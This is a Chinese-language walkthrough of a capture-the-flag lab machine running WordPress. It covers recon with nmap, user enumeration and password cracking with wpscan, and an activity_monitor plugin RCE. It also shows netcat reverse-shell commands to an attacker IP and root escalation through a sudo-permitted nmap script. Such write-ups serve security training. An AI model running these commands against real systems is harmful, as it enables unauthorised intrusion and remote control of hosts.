靶机下载地址
信息收集
主机探测
sudo nmap -sn 10.10.10.0/24
获取目标靶机IP地址10.10.10.17
初步扫描
sudo nmap -sT --min-rate 10000 -p- 10.10.10.17
可知22和80端口开启
详细信息扫描
sudo nmap -sT -sC -sV -O -p 22,80 10.10.10.17
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
漏洞脚本扫描
sudo nmap -sT --script=vuln -p 22,80 10.10.10.17
发现是wordpress
UDP扫描
sudo nmap -sU --top-ports 100 10.10.10.17
没有收获
渗透流程
修复自动跳转
访问80端口,发现自动跳转http://wordy
修改hosts,将wordy解析为10.10.10.17,成功访问。
WPSCAN扫描
使用wpscan扫描
sudo wpscan --url http://wordy --enumerate u,vp,vt --api-token your-token-here
枚举到一些用户
admin
graham
mark
sarah
jens
密码破解
注意这里字典要用/usr/share/wordlists/rockyou.txt,并且要过滤一下,不然你就只能硬跑
cat /usr/share/wordlists/rockyou.txt |grep k01>new_shit.txt
sudo wpscan --url http://wordy -U users -P password.txt -t 15
可以得到账户和密码
mark helpdesk01
后台登录
使用mark helpdesk01成功登录到后台,但是不是管理员,没有插件和主题管理。
但是发现了一个已安装的插件activity_monitor
漏洞利用获取反弹shell
activity_monitor插件存在RCE漏洞。使用searchsploit获取POC,我这里用的是50110.py执行得到反弹shell,但是这个shell不好用,而且会溢出断掉连接,如果你跟我用一样的话一定要再反弹一次shell。
再次反弹shell,并用python提升交互性。
攻击机nc -lvnp 4444
靶机nc 10.10.10.2 4444 -e /bin/bash
python -c “import pty;pty.spawn(‘/bin/bash’)”
敏感信息寻找
在mark的家目录下发现了新的用户和密码
graham - GSo7isUM1D4
查看/etc/passwd确实是可登录的用户
SSH登录
成功登录到graham
查看id,sudo -l,发现可以以jens的身份且无需密码执行/home/jens/backups.sh
并且因为graham和jens同属于dev组,具有对该文件的rwx权限
权限提升
往backups.sh写入
#! /bin/bash
/bin/bash
获取到jens身份的bash,但是权限仍然不够。
发现jens可以以root的身份执行nmap命令,可以用nmap来提权。
写入脚本echo "os.execute('nc 10.10.10.2 4444 -e /bin/bash')">shit
然后sudo nmap --script=shit即可提权
flag就在/root目录下面
总结
本次渗透测试通过信息收集发现web使用了wordpressCMS,利用wpscan用户枚举和密码破解登录到wordpress后台,利用activity_monitor的RCE漏洞获取fantanshell,通过敏感文件拿到graham - GSo7isUM1D4账户密码进行SSH登录,逐步利用SUID进行提权,总体难度较为简单。